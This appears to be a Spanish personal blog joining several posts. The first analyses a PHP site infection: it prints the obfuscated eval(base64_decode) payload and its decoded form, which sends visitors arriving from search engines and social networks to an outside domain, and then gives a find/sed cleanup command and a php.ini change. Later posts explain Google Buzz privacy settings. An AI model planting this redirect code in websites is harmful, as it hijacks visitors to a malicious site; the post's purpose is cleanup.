Este virus hace que al entrar en estas páginas, mediante enlaces procedentes de estos dominios:

• yandex
• yahoo
• google
• bing
• rambler
• gogo
• live.com
• aport
• nigma
• webalta
• baidu.com
• doubleclick.net
• bebun.ru
• stumbleuponcom
• bit.ly
• tinyurl.com
• clickbank.net
• blogspot.com
• myspace.com
• facebook.com
• aol.com

El enlace a la Web es redirigido a la Web: http://breakingbad.osa.pl o similares.

Este es el código del virus:

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9icmVha2luZ2JhZC5vc2EucGwvIik7DQoJZXhpdCgpOw0KfQ0KfQ0KCX0NCgl9"))

Que analizando su código tenemos:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://breakingbad.osa.pl/");
exit();
}
}
}
}

Si ya estáis infectados, y tenéis muchos ficheros modificados lo mejor que podéis hacer es usar un código como este (en consola) para que elimine toda la cadena de texto de los ficheros php infectados (bajo vuestra responsabilidad):

find * -type f -name '*.php' -exec sed -i 's/código a buscar//g' {} \;

Con lo que quedaría:

find * -type f -name '*.php' -exec sed -i 's/eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9icmVha2luZ2JhZC5vc2EucGwvIik7DQoJZXhpdCgpOw0KfQ0KfQ0KCX0NCgl9"))//g' {} \;

Otra opción también es deshabilitar la función eval de php. Si esto no afecta a ninguna página que esté en el servidor:

Abrir configuración php:

vi /etc/php.ini

modificar:

disable_funcions = "eval"

reiniciar servidor:

service httpd restart

En pocos días Internet se ha llenado de resultados sobre Google Buzz, pero me gustaría explicar algunos puntos importantes que se deben tener en cuenta:

¿Que implica un comentario público en Google buzz?

Todo que se publique como "público" será indexado por Google Search en sus resultados, puesto que estas entradas aparecen en el perfil público de Google.

Por ejemplo:

http://www.google.com/profiles/109348304351241456985

o bien

http://www.google.com/profiles/nombreusuario

Es importante conocer esto, ya que muchas veces no vamos a querer que el resto del mundo tenga acceso a los comentarios que pongamos.

Lo ideal para aquellos a quienes no les gusta las redes sociales, pero en cambio les gusta compartir cosas con sus contactos de GMail, sería poner los post como privados, y asignados a los grupos que interese.

¿Qué comentarios puedo ver?

Como usuario de Buzz puedes ver todos los comentarios de las personas que tienes configuradas como “siguiendo” que hagan posts públicos o bien a un grupo privado al que pertenezcas.

Pero también puedes seguir un hilo de conversación de un grupo de personas que no conoces, si una de las que responde es contacto tuyo.

¿Cómo envío un post privado a un usuario concreto sin crear un grupo?

Por último, lo más importante,  cómo enviar un post privado de forma individual:

1. Crear un Buzz privado.
2. Seleccionar un grupo de amigos con 0 amigos.
3. Usar el símbolo @ más la dirección de correo de tu amigo a quien enviar el Buzz. Por ejemplo @micorreo@gmail.com
4. Publicar el mensaje y éste será privado entre tú y la persona o personas que has puesto en el cuerpo del mensaje.

Esta información la hemos obtenido  conjuntamente con unos compañeros, entre ellos Gerard Sanz, a base de hacer pruebas…. ya que Google buzz no dispone de ayuda al respeto.

Espero que os sea útil esta información!!

Actualizado:

Podéis encontrar más información aquí: http://aext.net/2010/02/12-undocumented-tricks-for-google-buzz/

y aquí: Google Buzz introduce nuevos cambios por segunda vez en una semana

Nueva actualización 21/02/2010 22:00

El equipo de Google Buzz ha sacado un Buzz donde se van contando las mejoras y algunos trucos. Os dejo el link: http://www.google.com/profiles/googlebuzz#buzz

A partir de ahora espero que me sea más cómodo administrar los contenidos y pueda actualizarla más fácilmente.

Saludos,

David

En la página principal iré publicando información sobre diferentes proyectos que he llevado a cabo o que estoy desarrollando.
Espero que sea de vuestro agrado.

Saludos,
David Figueres